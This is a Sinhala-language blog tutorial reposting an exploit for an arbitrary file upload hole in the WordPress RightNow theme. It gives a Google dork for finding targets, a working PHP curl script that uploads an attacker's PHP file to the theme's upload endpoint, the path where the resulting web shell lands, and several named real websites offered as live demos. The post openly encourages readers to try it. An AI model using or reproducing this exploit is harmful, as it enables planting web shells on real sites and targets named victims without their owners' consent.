WordPress Right Now theme - Arbitrary File Upload Vulnerability

ඔන්න මේක පොඩි ටියුට් එකක්. Website එකකට shell එකක් දාගන්න විදිහ තමයි දාන්න යන්නෙ. සමහරු නම් දන්නවා ඇති. මේක නොදන්න අයට. කරලා බැලුවට කමක් නෑ, හැබැයි Elite_x, Cryp70n, www.synkoda.com කියන නම් 3 ගාවන්න තහනම් ඈ.

මෙන්න වීඩියෝ එක.



###############################################################
# Exploit Title: WordPress Right Now theme - Arbitrary File Upload Vulnerability
# Author: Cryp70n
# Date: 10/31/2013
# Category: webapps/php
# Google dork: inurl:wp-content/themes/RightNow/
###############################################################
= = = = = = = =
1)Exploit =
2)Real Demo = http://monroemartincomedy.com//wp-conten...index.html
= = = = = = = =

1)Exploit :
= = = = = = 
<?php
$uploadfile="YourFile.php";
$ch = curl_init("http://[Target]/rightnowwp/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

2) Exploit demo :
= = = = = = = = =
http://brainframe.it/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php
http://swedishhousemafia.it/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php
http://www.iteva.co/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php

# #### #### #### #### #### #### #### #### #
Shell Path : http://[Target]/wp-content/uploads/settingsimages/YourFile.php
# #### #### #### #### #### #### #### #### #


එහෙනම් හොද නරක කියාගෙන, කමෙන්ට් එකකුත් දාගෙනම යන්න ඈ. Channel එකට Subscribe කරන්නත් අමතක කරන්න එපා.
Newest
Previous
Next Post »


බැලුවද?

Comment එකකුත් දාගෙනම යමු නේ.....
ConversionConversion EmoticonEmoticon